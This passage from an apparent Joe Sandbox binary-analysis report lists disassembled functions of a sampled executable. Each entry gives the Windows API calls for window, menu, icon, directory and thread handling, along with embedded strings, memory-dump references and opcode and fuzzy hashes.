                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                            • GetSysColor.USER32(00000008), ref: 0044A265
                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                            • String ID:
                            • API String ID: 1744303182-0
                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                            Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                            • __mtterm.LIBCMT ref: 00417C34
                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                            • __init_pointers.LIBCMT ref: 00417CE6
                            • __calloc_crt.LIBCMT ref: 00417D54
                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                            • API String ID: 4163708885-3819984048
                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                            Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll$IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2485277191-404129466
                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                            Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                            • SetWindowTextW.USER32(?,?), ref: 00454678
                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                            • GetWindowRect.USER32(?,?), ref: 004546F5
                            • SetWindowTextW.USER32(?,?), ref: 00454765
                            • GetDesktopWindow.USER32 ref: 0045476F
                            • GetWindowRect.USER32(00000000), ref: 00454776
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                            • GetClientRect.USER32(?,?), ref: 004547D2
                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                            • String ID:
                            • API String ID: 3869813825-0
                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                            Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00464B28
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                            • _wcslen.LIBCMT ref: 00464C28
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                            • _wcslen.LIBCMT ref: 00464CBA
                            • _wcslen.LIBCMT ref: 00464CD0
                            • _wcslen.LIBCMT ref: 00464CEF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$Directory$CurrentSystem
                            • String ID: D
                            • API String ID: 1914653954-2746444292
                            • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                            • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                            Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                            Download Yara Rule
                            APIs
                            • _wcsncpy.LIBCMT ref: 0045CE39
                            • __wsplitpath.LIBCMT ref: 0045CE78
                            • _wcscat.LIBCMT ref: 0045CE8B
                            • _wcscat.LIBCMT ref: 0045CE9E
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                            • _wcscpy.LIBCMT ref: 0045CF61
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                            • String ID: *.*
                            • API String ID: 1153243558-438819550
                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                            Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll
                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                            • API String ID: 3832890014-4202584635
                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                            Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                            • GetFocus.USER32 ref: 0046A0DD
                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessagePost$CtrlFocus
                            • String ID: 0
                            • API String ID: 1534620443-4108050209
                            • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                            • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                            Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(?), ref: 004558E3
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$CreateDestroy
                            • String ID: ,$tooltips_class32
                            • API String ID: 1109047481-3856767331
                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                            Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                            • GetMenuItemCount.USER32(?), ref: 00468C45
                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                            • GetMenuItemCount.USER32 ref: 00468CFD
                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                            • GetCursorPos.USER32(?), ref: 00468D3F
                            • SetForegroundWindow.USER32(?), ref: 00468D49
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                            • String ID: 0
                            • API String ID: 1441871840-4108050209
                            • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                            • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                            Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                            • __swprintf.LIBCMT ref: 00460915
                            • __swprintf.LIBCMT ref: 0046092D
                            • _wprintf.LIBCMT ref: 004609E1
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 3631882475-2268648507
                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                            Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                            Download Yara Rule
                            APIs
                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                            • SendMessageW.USER32 ref: 00471740
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                            • SendMessageW.USER32 ref: 0047184F
                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                            • String ID:
                            • API String ID: 4116747274-0
                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                            Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                            • _wcslen.LIBCMT ref: 00461683
                            • __swprintf.LIBCMT ref: 00461721
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                            • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                            • GetDlgCtrlID.USER32(?), ref: 00461869
                            • GetWindowRect.USER32(?,?), ref: 004618A4
